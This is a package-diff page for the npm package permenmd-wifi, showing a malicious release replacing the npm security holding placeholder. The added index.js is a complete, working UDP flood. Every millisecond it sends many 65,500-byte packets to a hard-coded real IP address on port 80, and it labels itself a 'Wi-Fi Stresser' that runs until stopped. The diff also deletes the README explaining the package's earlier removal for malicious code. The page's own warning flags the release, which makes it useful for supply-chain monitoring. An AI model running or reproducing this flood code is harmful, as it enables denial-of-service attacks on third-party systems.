permenmd-wifi 0.0.1-security → 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of permenmd-wifi might be problematic. Click here for more details.
- package/index.js +40 -0
- package/package.json +15 -6
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,40 @@
|
|
1
|
+
// index.js
|
2
|
+
const dgram = require('dgram');
|
3
|
+
|
4
|
+
const target = '108.177.96.113';
|
5
|
+
const port = 80;
|
6
|
+
|
7
|
+
function generatePayload(size) {
|
8
|
+
let payload = Buffer.alloc(size);
|
9
|
+
payload.fill('A');
|
10
|
+
return payload;
|
11
|
+
}
|
12
|
+
|
13
|
+
const payload = generatePayload(65500);
|
14
|
+
|
15
|
+
setInterval(() => {
|
16
|
+
const socket = dgram.createSocket('udp4');
|
17
|
+
for (let p = 0; p < 50; p++) {
|
18
|
+
socket.send(payload, 0, payload.length, port, target);
|
19
|
+
}
|
20
|
+
socket.send(payload, 0, payload.length, port, target, (err) => {
|
21
|
+
if (err) {
|
22
|
+
console.error('Error sending message:', err);
|
23
|
+
}
|
24
|
+
socket.close();
|
25
|
+
});
|
26
|
+
}, 1);
|
27
|
+
|
28
|
+
console.clear();
|
29
|
+
console.log(`
|
30
|
+
██████╗ ███████╗██████╗ ███╗ ███╗███████╗███╗ ██╗███╗ ███╗██████╗
|
31
|
+
██╔══██╗██╔════╝██╔══██╗████╗ ████║██╔════╝████╗ ██║████╗ ████║██╔══██╗
|
32
|
+
██████╔╝█████╗ ██████╔╝██╔████╔██║█████╗ ██╔██╗ ██║██╔████╔██║██║ ██║
|
33
|
+
██╔═══╝ ██╔══╝ ██╔══██╗██║╚██╔╝██║██╔══╝ ██║╚██╗██║██║╚██╔╝██║██║ ██║
|
34
|
+
██║ ███████╗██║ ██║██║ ╚═╝ ██║███████╗██║ ╚████║██║ ╚═╝ ██║██████╔╝
|
35
|
+
╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═════╝
|
36
|
+
PermenMD Wifi Stresser
|
37
|
+
=======================================================================
|
38
|
+
|
39
|
+
Ctrl + C To Stop The Attack
|
40
|
+
`);
|
package/package.json
CHANGED
@@ -1,6 +1,15 @@
|
|
1
|
-
{
|
2
|
-
"name": "permenmd-wifi",
|
3
|
-
"version": "0.0
|
4
|
-
"description": "
|
5
|
-
"
|
6
|
-
|
1
|
+
{
|
2
|
+
"name": "permenmd-wifi",
|
3
|
+
"version": "1.0.0",
|
4
|
+
"description": "A Wi-Fi stresser tool",
|
5
|
+
"main": "index.js",
|
6
|
+
"bin": {
|
7
|
+
"starsxwifi": "index.js"
|
8
|
+
},
|
9
|
+
"author": "PermenMD",
|
10
|
+
"license": "MIT",
|
11
|
+
"scripts": {
|
12
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
13
|
+
},
|
14
|
+
"keywords": []
|
15
|
+
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=permenmd-wifi for more information.
|